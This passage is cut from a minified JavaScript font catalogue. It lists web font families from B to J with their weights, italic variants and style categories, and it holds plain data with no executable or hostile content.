Ink",v:[400,700],f:"serif"},{n:"Arima",v:[100,200,300,400,500,600,700],f:"display"},{n:"B612",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"B612 Mono",v:[400,"400i",700,"700i"],f:"monospace"},{n:"BIZ UDGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDMincho",v:[400,700],f:"serif"},{n:"BIZ UDPGothic",v:[400,700],f:"sans-serif"},{n:"BIZ UDPMincho",v:[400,700],f:"serif"},{n:"Babylonica",v:[400],f:"handwriting"},{n:"Bad Script",v:[400],f:"handwriting"},{n:"Bahiana",v:[400],f:"display"},{n:"Bahianita",v:[400],f:"display"},{n:"Bai Jamjuree",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Bakbak One",v:[400],f:"display"},{n:"Ballet",v:[400],f:"handwriting"},{n:"Baloo 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhai 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaijaan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Bhaina 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Chettan 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Da 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Paaji 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tamma 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Tammudu 2",v:[400,500,600,700,800],f:"display"},{n:"Baloo Thambi 2",v:[400,500,600,700,800],f:"display"},{n:"Balsamiq Sans",v:[400,"400i",700,"700i"],f:"display"},{n:"Balthazar",v:[400],f:"serif"},{n:"Bangers",v:[400],f:"display"},{n:"Barlow",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barlow Semi Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Barriecito",v:[400],f:"display"},{n:"Barrio",v:[400],f:"display"},{n:"Basic",v:[400],f:"sans-serif"},{n:"Baskervville",v:[400,"400i"],f:"serif"},{n:"Battambang",v:["100","300",400,700,900],f:"display"},{n:"Baumans",v:[400],f:"display"},{n:"Bayon",v:[400],f:"sans-serif"},{n:"Be Vietnam Pro",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Beau Rivage",v:[400],f:"handwriting"},{n:"Bebas Neue",v:[400],f:"sans-serif"},{n:"Belgrano",v:[400],f:"serif"},{n:"Bellefair",v:[400],f:"serif"},{n:"Belleza",v:[400],f:"sans-serif"},{n:"Bellota",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"Bellota Text",v:["300","300i",400,"400i",700,"700i"],f:"display"},{n:"BenchNine",v:["300",400,700],f:"sans-serif"},{n:"Benne",v:[400],f:"serif"},{n:"Bentham",v:[400],f:"serif"},{n:"Berkshire Swash",v:[400],f:"handwriting"},{n:"Besley",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Beth Ellen",v:[400],f:"handwriting"},{n:"Bevan",v:[400,"400i"],f:"display"},{n:"BhuTuka Expanded One",v:[400],f:"display"},{n:"Big Shoulders Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Inline Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Display",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Stencil Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Big Shoulders Text",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Bigelow Rules",v:[400],f:"display"},{n:"Bigshot One",v:[400],f:"display"},{n:"Bilbo",v:[400],f:"handwriting"},{n:"Bilbo Swash Caps",v:[400],f:"handwriting"},{n:"BioRhyme",v:["200","300",400,700,800],f:"serif"},{n:"BioRhyme Expanded",v:["200","300",400,700,800],f:"serif"},{n:"Birthstone",v:[400],f:"handwriting"},{n:"Birthstone Bounce",v:[400,500],f:"handwriting"},{n:"Biryani",v:["200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bitter",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Black And White Picture",v:[400],f:"sans-serif"},{n:"Black Han Sans",v:[400],f:"sans-serif"},{n:"Black Ops One",v:[400],f:"display"},{n:"Blinker",v:["100","200","300",400,600,700,800,900],f:"sans-serif"},{n:"Bodoni Moda",v:[400,500,600,700,800,900,"400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Bokor",v:[400],f:"display"},{n:"Bona Nova",v:[400,"400i",700],f:"serif"},{n:"Bonbon",v:[400],f:"handwriting"},{n:"Bonheur Royale",v:[400],f:"handwriting"},{n:"Boogaloo",v:[400],f:"display"},{n:"Bowlby One",v:[400],f:"display"},{n:"Bowlby One SC",v:[400],f:"display"},{n:"Brawler",v:[400,700],f:"serif"},{n:"Bree Serif",v:[400],f:"serif"},{n:"Brygada 1918",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Bubblegum Sans",v:[400],f:"display"},{n:"Bubbler One",v:[400],f:"sans-serif"},{n:"Buda",v:["300"],f:"display"},{n:"Buenard",v:[400,700],f:"serif"},{n:"Bungee",v:[400],f:"display"},{n:"Bungee Hairline",v:[400],f:"display"},{n:"Bungee Inline",v:[400],f:"display"},{n:"Bungee Outline",v:[400],f:"display"},{n:"Bungee Shade",v:[400],f:"display"},{n:"Butcherman",v:[400],f:"display"},{n:"Butterfly Kids",v:[400],f:"handwriting"},{n:"Blaka",v:[400],f:"display"},{n:"Blaka Hollow",v:[400],f:"display"},{n:"Blaka Ink",v:[400],f:"display"},{n:"Braah One",v:[400],f:"sans-serif"},{n:"Bruno Ace",v:[400],f:"display"},{n:"Bruno Ace SC",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Bungee Spice",v:[400],f:"display"},{n:"Cabin",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cabin Condensed",v:[400,500,600,700],f:"sans-serif"},{n:"Cabin Sketch",v:[400,700],f:"display"},{n:"Caesar Dressing",v:[400],f:"display"},{n:"Cagliostro",v:[400],f:"sans-serif"},{n:"Cairo",v:["200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caladea",v:[400,"400i",700,"700i"],f:"serif"},{n:"Calistoga",v:[400],f:"display"},{n:"Calligraffitti",v:[400],f:"handwriting"},{n:"Cambay",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cambo",v:[400],f:"serif"},{n:"Candal",v:[400],f:"sans-serif"},{n:"Cantarell",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Cantata One",v:[400],f:"serif"},{n:"Cantora One",v:[400],f:"sans-serif"},{n:"Capriola",v:[400],f:"sans-serif"},{n:"Caramel",v:[400],f:"handwriting"},{n:"Carattere",v:[400],f:"handwriting"},{n:"Cardo",v:[400,"400i",700],f:"serif"},{n:"Carme",v:[400],f:"sans-serif"},{n:"Carrois Gothic",v:[400],f:"sans-serif"},{n:"Carrois Gothic SC",v:[400],f:"sans-serif"},{n:"Carter One",v:[400],f:"display"},{n:"Castoro",v:[400,"400i"],f:"serif"},{n:"Catamaran",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Caudex",v:[400,"400i",700,"700i"],f:"serif"},{n:"Caveat",v:[400,500,600,700],f:"handwriting"},{n:"Caveat Brush",v:[400],f:"handwriting"},{n:"Cedarville Cursive",v:[400],f:"handwriting"},{n:"Ceviche One",v:[400],f:"display"},{n:"Chakra Petch",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Changa",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Changa One",v:[400,"400i"],f:"display"},{n:"Chango",v:[400],f:"display"},{n:"Charm",v:[400,700],f:"handwriting"},{n:"Charmonman",v:[400,700],f:"handwriting"},{n:"Chathura",v:["100","300",400,700,800],f:"sans-serif"},{n:"Chau Philomene One",v:[400,"400i"],f:"sans-serif"},{n:"Chela One",v:[400],f:"display"},{n:"Chelsea Market",v:[400],f:"display"},{n:"Chenla",v:[400],f:"display"},{n:"Cherish",v:[400],f:"handwriting"},{n:"Cherry Cream Soda",v:[400],f:"display"},{n:"Cherry Swash",v:[400,700],f:"display"},{n:"Chewy",v:[400],f:"display"},{n:"Chicle",v:[400],f:"display"},{n:"Chilanka",v:[400],f:"handwriting"},{n:"Chivo",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Chonburi",v:[400],f:"display"},{n:"Cinzel",v:[400,500,600,700,800,900],f:"serif"},{n:"Cinzel Decorative",v:[400,700,900],f:"display"},{n:"Clicker Script",v:[400],f:"handwriting"},{n:"Coda",v:[400,800],f:"display"},{n:"Coda Caption",v:[800],f:"sans-serif"},{n:"Codystar",v:["300",400],f:"display"},{n:"Coiny",v:[400],f:"display"},{n:"Combo",v:[400],f:"display"},{n:"Comfortaa",v:["300",400,500,600,700],f:"display"},{n:"Comforter",v:[400],f:"handwriting"},{n:"Comforter Brush",v:[400],f:"handwriting"},{n:"Comic Neue",v:["300","300i",400,"400i",700,"700i"],f:"handwriting"},{n:"Coming Soon",v:[400],f:"handwriting"},{n:"Commissioner",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Concert One",v:[400],f:"display"},{n:"Condiment",v:[400],f:"handwriting"},{n:"Content",v:[400,700],f:"display"},{n:"Contrail One",v:[400],f:"display"},{n:"Convergence",v:[400],f:"sans-serif"},{n:"Cookie",v:[400],f:"handwriting"},{n:"Copse",v:[400],f:"serif"},{n:"Corben",v:[400,700],f:"display"},{n:"Corinthia",v:[400,700],f:"handwriting"},{n:"Cormorant",v:[300,400,500,600,700,"300i","400i","500i","600i","700i"],f:"serif"},{n:"Cormorant Garamond",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant Infant",v:["300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Cormorant SC",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Unicase",v:["300",400,500,600,700],f:"serif"},{n:"Cormorant Upright",v:["300",400,500,600,700],f:"serif"},{n:"Courgette",v:[400],f:"handwriting"},{n:"Courier Prime",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Cousine",v:[400,"400i",700,"700i"],f:"monospace"},{n:"Coustard",v:[400,900],f:"serif"},{n:"Covered By Your Grace",v:[400],f:"handwriting"},{n:"Crafty Girls",v:[400],f:"handwriting"},{n:"Creepster",v:[400],f:"display"},{n:"Crete Round",v:[400,"400i"],f:"serif"},{n:"Crimson Pro",v:["200","300",400,500,600,700,800,900,"200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Croissant One",v:[400],f:"display"},{n:"Crushed",v:[400],f:"display"},{n:"Cuprum",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Cute Font",v:[400],f:"display"},{n:"Cutive",v:[400],f:"serif"},{n:"Cutive Mono",v:[400],f:"monospace"},{n:"Cairo Play",v:[200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Carlito",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Castoro Titling",v:[400],f:"display"},{n:"Charis SIL",v:[400,"400i",700,"700i"],f:"serif"},{n:"Cherry Bomb One",v:[400],f:"display"},{n:"Chivo Mono",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"monospace"},{n:"Chokokutai",v:[400],f:"display"},{n:"Climate Crisis",v:[400],f:"display"},{n:"Comme",v:[100,200,300,400,500,600,700,800,900],f:"sans-serif"},{n:"Crimson Text",v:[400,"400i",600,"600i",700,"700i"],f:"serif"},{n:"DM Mono",v:["300","300i",400,"400i",500,"500i"],f:"monospace"},{n:"DM Sans",v:[400,"400i",500,"500i",700,"700i"],f:"sans-serif"},{n:"DM Serif Display",v:[400,"400i"],f:"serif"},{n:"DM Serif Text",v:[400,"400i"],f:"serif"},{n:"Damion",v:[400],f:"handwriting"},{n:"Dancing Script",v:[400,500,600,700],f:"handwriting"},{n:"Dangrek",v:[400],f:"display"},{n:"Darker Grotesque",v:["300",400,500,600,700,800,900],f:"sans-serif"},{n:"David Libre",v:[400,500,700],f:"serif"},{n:"Dawning of a New Day",v:[400],f:"handwriting"},{n:"Days One",v:[400],f:"sans-serif"},{n:"Dekko",v:[400],f:"handwriting"},{n:"Dela Gothic One",v:[400],f:"display"},{n:"Delius",v:[400],f:"handwriting"},{n:"Delius Swash Caps",v:[400],f:"handwriting"},{n:"Delius Unicase",v:[400,700],f:"handwriting"},{n:"Della Respira",v:[400],f:"serif"},{n:"Denk One",v:[400],f:"sans-serif"},{n:"Devonshire",v:[400],f:"handwriting"},{n:"Dhurjati",v:[400],f:"sans-serif"},{n:"Didact Gothic",v:[400],f:"sans-serif"},{n:"Diplomata",v:[400],f:"display"},{n:"Diplomata SC",v:[400],f:"display"},{n:"Do Hyeon",v:[400],f:"sans-serif"},{n:"Dokdo",v:[400],f:"handwriting"},{n:"Domine",v:[400,500,600,700],f:"serif"},{n:"Donegal One",v:[400],f:"serif"},{n:"Dongle",v:["300",400,700],f:"sans-serif"},{n:"Doppio One",v:[400],f:"sans-serif"},{n:"Dorsa",v:[400],f:"sans-serif"},{n:"Dosis",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"DotGothic16",v:[400],f:"sans-serif"},{n:"Dr Sugiyama",v:[400],f:"handwriting"},{n:"Duru Sans",v:[400],f:"sans-serif"},{n:"Dynalight",v:[400],f:"display"},{n:"Darumadrop One",v:[400],f:"display"},{n:"Delicious Handrawn",v:[400],f:"handwriting"},{n:"DynaPuff",v:[400,500,600,700],f:"display"},{n:"Edu NSW ACT Foundation",v:[400,500,600,700],f:"handwriting"},{n:"EB Garamond",v:[400,500,600,700,800,"400i","500i","600i","700i","800i"],f:"serif"},{n:"Eagle Lake",v:[400],f:"handwriting"},{n:"East Sea Dokdo",v:[400],f:"handwriting"},{n:"Eater",v:[400],f:"display"},{n:"Economica",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Eczar",v:[400,500,600,700,800],f:"serif"},{n:"El Messiri",v:[400,500,600,700],f:"sans-serif"},{n:"Electrolize",v:[400],f:"sans-serif"},{n:"Elsie",v:[400,900],f:"display"},{n:"Elsie Swash Caps",v:[400,900],f:"display"},{n:"Emblema One",v:[400],f:"display"},{n:"Emilys Candy",v:[400],f:"display"},{n:"Encode Sans",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans SC",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Condensed",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Encode Sans Semi Expanded",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Engagement",v:[400],f:"handwriting"},{n:"Englebert",v:[400],f:"sans-serif"},{n:"Enriqueta",v:[400,500,600,700],f:"serif"},{n:"Ephesis",v:[400],f:"handwriting"},{n:"Epilogue",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Erica One",v:[400],f:"display"},{n:"Esteban",v:[400],f:"serif"},{n:"Estonia",v:[400],f:"handwriting"},{n:"Euphoria Script",v:[400],f:"handwriting"},{n:"Ewert",v:[400],f:"display"},{n:"Exo",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Exo 2",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Expletus Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"display"},{n:"Explora",v:[400],f:"handwriting"},{n:"Edu QLD Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu SA Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu TAS Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Edu VIC WA NT Beginner",v:[400,500,600,700],f:"handwriting"},{n:"Fahkwang",v:["200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"Familjen Grotesk",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Fanwood Text",v:[400,"400i"],f:"serif"},{n:"Farro",v:["300",400,500,700],f:"sans-serif"},{n:"Farsan",v:[400],f:"display"},{n:"Fascinate",v:[400],f:"display"},{n:"Fascinate Inline",v:[400],f:"display"},{n:"Faster One",v:[400],f:"display"},{n:"Fasthand",v:[400],f:"display"},{n:"Fauna One",v:[400],f:"serif"},{n:"Faustina",v:["300",400,500,600,700,800,"300i","400i","500i","600i","700i","800i"],f:"serif"},{n:"Federant",v:[400],f:"display"},{n:"Federo",v:[400],f:"sans-serif"},{n:"Felipa",v:[400],f:"handwriting"},{n:"Fenix",v:[400],f:"serif"},{n:"Festive",v:[400],f:"handwriting"},{n:"Finger Paint",v:[400],f:"display"},{n:"Fira Code",v:["300",400,500,600,700],f:"monospace"},{n:"Fira Mono",v:[400,500,700],f:"monospace"},{n:"Fira Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fira Sans Extra Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"sans-serif"},{n:"Fjalla One",v:[400],f:"sans-serif"},{n:"Fjord One",v:[400],f:"serif"},{n:"Flamenco",v:["300",400],f:"display"},{n:"Flavors",v:[400],f:"display"},{n:"Fleur De Leah",v:[400],f:"handwriting"},{n:"Flow Block",v:[400],f:"display"},{n:"Flow Circular",v:[400],f:"display"},{n:"Flow Rounded",v:[400],f:"display"},{n:"Fondamento",v:[400,"400i"],f:"handwriting"},{n:"Fontdiner Swanky",v:[400],f:"display"},{n:"Forum",v:[400],f:"display"},{n:"Francois One",v:[400],f:"sans-serif"},{n:"Frank Ruhl Libre",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Fraunces",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"serif"},{n:"Freckle Face",v:[400],f:"display"},{n:"Fredericka the Great",v:[400],f:"display"},{n:"Fredoka",v:["300",400,500,600,700],f:"sans-serif"},{n:"Freehand",v:[400],f:"display"},{n:"Fresca",v:[400],f:"sans-serif"},{n:"Frijole",v:[400],f:"display"},{n:"Fruktur",v:[400,"400i"],f:"display"},{n:"Fugaz One",v:[400],f:"display"},{n:"Fuggles",v:[400],f:"handwriting"},{n:"Fuzzy Bubbles",v:[400,700],f:"handwriting"},{n:"Figtree",v:[300,400,500,600,700,800,900,"300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Finlandica",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Foldit",v:[100,200,300,400,500,600,700,800,900],f:"display"},{n:"Fragment Mono",v:[400,"400i"],f:"monospace"},{n:"GFS Didot",v:[400],f:"serif"},{n:"GFS Neohellenic",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Gabriela",v:[400],f:"serif"},{n:"Gaegu",v:["300",400,700],f:"handwriting"},{n:"Gafata",v:[400],f:"sans-serif"},{n:"Galada",v:[400],f:"display"},{n:"Galdeano",v:[400],f:"sans-serif"},{n:"Galindo",v:[400],f:"display"},{n:"Gamja Flower",v:[400],f:"handwriting"},{n:"Gayathri",v:["100",400,700],f:"sans-serif"},{n:"Gelasio",v:[400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"Gemunu Libre",v:["200","300",400,500,600,700,800],f:"sans-serif"},{n:"Genos",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geo",v:[400,"400i"],f:"sans-serif"},{n:"Georama",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Geostar",v:[400],f:"display"},{n:"Geostar Fill",v:[400],f:"display"},{n:"Germania One",v:[400],f:"display"},{n:"Gideon Roman",v:[400],f:"display"},{n:"Gidugu",v:[400],f:"sans-serif"},{n:"Gilda Display",v:[400],f:"serif"},{n:"Girassol",v:[400],f:"display"},{n:"Give You Glory",v:[400],f:"handwriting"},{n:"Glass Antiqua",v:[400],f:"display"},{n:"Glegoo",v:[400,700],f:"serif"},{n:"Gloria Hallelujah",v:[400],f:"handwriting"},{n:"Glory",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"sans-serif"},{n:"Gluten",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Goblin One",v:[400],f:"display"},{n:"Gochi Hand",v:[400],f:"handwriting"},{n:"Goldman",v:[400,700],f:"display"},{n:"Gorditas",v:[400,700],f:"display"},{n:"Gothic A1",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Gotu",v:[400],f:"sans-serif"},{n:"Goudy Bookletter 1911",v:[400],f:"serif"},{n:"Gowun Batang",v:[400,700],f:"serif"},{n:"Gowun Dodum",v:[400],f:"sans-serif"},{n:"Graduate",v:[400],f:"display"},{n:"Grand Hotel",v:[400],f:"handwriting"},{n:"Grandstander",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"display"},{n:"Grape Nuts",v:[400],f:"handwriting"},{n:"Gravitas One",v:[400],f:"display"},{n:"Great Vibes",v:[400],f:"handwriting"},{n:"Grechen Fuemen",v:[400],f:"handwriting"},{n:"Grenze",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i",800,"800i",900,"900i"],f:"serif"},{n:"Grenze Gotisch",v:["100","200","300",400,500,600,700,800,900],f:"display"},{n:"Grey Qo",v:[400],f:"handwriting"},{n:"Griffy",v:[400],f:"display"},{n:"Gruppo",v:[400],f:"sans-serif"},{n:"Gudea",v:[400,"400i",700],f:"sans-serif"},{n:"Gugi",v:[400],f:"display"},{n:"Gupter",v:[400,500,700],f:"serif"},{n:"Gurajada",v:[400],f:"serif"},{n:"Gwendolyn",v:[400,700],f:"handwriting"},{n:"Gajraj One",v:[400],f:"display"},{n:"Gantari",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Gloock",v:[400],f:"serif"},{n:"Golos Text",v:[400,500,600,700,800,900],f:"sans-serif"},{n:"Gulzar",v:[400],f:"serif"},{n:"Gentium Book Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Gentium Plus",v:[400,"400i",700,"700i"],f:"serif"},{n:"Habibi",v:[400],f:"serif"},{n:"Hachi Maru Pop",v:[400],f:"handwriting"},{n:"Hahmlet",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Halant",v:["300",400,500,600,700],f:"serif"},{n:"Hammersmith One",v:[400],f:"sans-serif"},{n:"Hanalei",v:[400],f:"display"},{n:"Hanalei Fill",v:[400],f:"display"},{n:"Handlee",v:[400],f:"handwriting"},{n:"Hanuman",v:["100","300",400,700,900],f:"serif"},{n:"Happy Monkey",v:[400],f:"display"},{n:"Harmattan",v:[400,500,600,700],f:"sans-serif"},{n:"Headland One",v:[400],f:"serif"},{n:"Heebo",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Henny Penny",v:[400],f:"display"},{n:"Hepta Slab",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Herr Von Muellerhoff",v:[400],f:"handwriting"},{n:"Hi Melody",v:[400],f:"handwriting"},{n:"Hina Mincho",v:[400],f:"serif"},{n:"Hind",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Guntur",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Madurai",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Siliguri",v:["300",400,500,600,700],f:"sans-serif"},{n:"Hind Vadodara",v:["300",400,500,600,700],f:"sans-serif"},{n:"Holtwood One SC",v:[400],f:"serif"},{n:"Homemade Apple",v:[400],f:"handwriting"},{n:"Homenaje",v:[400],f:"sans-serif"},{n:"Hubballi",v:[400],f:"display"},{n:"Hurricane",v:[400],f:"handwriting"},{n:"Hanken Grotesk",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"IBM Plex Mono",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"monospace"},{n:"IBM Plex Sans",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Arabic",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Condensed",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"sans-serif"},{n:"IBM Plex Sans Devanagari",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Hebrew",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans KR",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Sans Thai Looped",v:["100","200","300",400,500,600,700],f:"sans-serif"},{n:"IBM Plex Serif",v:["100","100i","200","200i","300","300i",400,"400i",500,"500i",600,"600i",700,"700i"],f:"serif"},{n:"IM Fell DW Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell DW Pica SC",v:[400],f:"serif"},{n:"IM Fell Double Pica",v:[400,"400i"],f:"serif"},{n:"IM Fell Double Pica SC",v:[400],f:"serif"},{n:"IM Fell English",v:[400,"400i"],f:"serif"},{n:"IM Fell English SC",v:[400],f:"serif"},{n:"IM Fell French Canon",v:[400,"400i"],f:"serif"},{n:"IM Fell French Canon SC",v:[400],f:"serif"},{n:"IM Fell Great Primer",v:[400,"400i"],f:"serif"},{n:"IM Fell Great Primer SC",v:[400],f:"serif"},{n:"Ibarra Real Nova",v:[400,500,600,700,"400i","500i","600i","700i"],f:"serif"},{n:"Iceberg",v:[400],f:"display"},{n:"Iceland",v:[400],f:"display"},{n:"Imbue",v:["100","200","300",400,500,600,700,800,900],f:"serif"},{n:"Imperial Script",v:[400],f:"handwriting"},{n:"Imprima",v:[400],f:"sans-serif"},{n:"Inconsolata",v:["200","300",400,500,600,700,800,900],f:"monospace"},{n:"Inder",v:[400],f:"sans-serif"},{n:"Indie Flower",v:[400],f:"handwriting"},{n:"Ingrid Darling",v:[400],f:"handwriting"},{n:"Inika",v:[400,700],f:"serif"},{n:"Inknut Antiqua",v:["300",400,500,600,700,800,900],f:"serif"},{n:"Inria Sans",v:["300","300i",400,"400i",700,"700i"],f:"sans-serif"},{n:"Inria Serif",v:["300","300i",400,"400i",700,"700i"],f:"serif"},{n:"Inspiration",v:[400],f:"handwriting"},{n:"Inter",v:["100","200","300",400,500,600,700,800,900],f:"sans-serif"},{n:"Irish Grover",v:[400],f:"display"},{n:"Island Moments",v:[400],f:"handwriting"},{n:"Istok Web",v:[400,"400i",700,"700i"],f:"sans-serif"},{n:"Italiana",v:[400],f:"serif"},{n:"Italianno",v:[400],f:"handwriting"},{n:"Itim",v:[400],f:"handwriting"},{n:"IBM Plex Sans JP",v:[100,200,300,400,500,600,700],f:"sans-serif"},{n:"Instrument Sans",v:[400,500,600,700,"400i","500i","600i","700i"],f:"sans-serif"},{n:"Instrument Serif",v:[400,"400i"],f:"serif"},{n:"Inter Tight",v:[100,200,300,400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Jacques Francois",v:[400],f:"serif"},{n:"Jacques Francois Shadow",v:[400],f:"display"},{n:"Jaldi",v:[400,700],f:"sans-serif"},{n:"JetBrains Mono",v:["100","200","300",400,500,600,700,800,"100i","200i","300i","400i","500i","600i","700i","800i"],f:"monospace"},{n:"Jim Nightshade",v:[400],f:"handwriting"},{n:"Jockey One",v:[400],f:"sans-serif"},{n:"Jolly Lodger",v:[400],f:"display"},{n:"Jomhuria",v:[400],f:"display"},{n:"Jomolhari",v:[400],f:"serif"},{n:"Josefin Sans",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"sans-serif"},{n:"Josefin Slab",v:["100","200","300",400,500,600,700,"100i","200i","300i","400i","500i","600i","700i"],f:"serif"},{n:"Jost",v:["100","200","300",400,500,600,700,800,900,"100i","200i","300i","400i","500i","600i","700i","800i","900i"],f:"sans-serif"},{n:"Joti One",v:[400],f:"display"},{n:"Jua",v:[400],f:"sans-serif"},{n:"Judson",v:[400,"400i",700],f:"serif"},{n:"Julee",v:[400],f:"handwriting"},{n:"Julius Sans 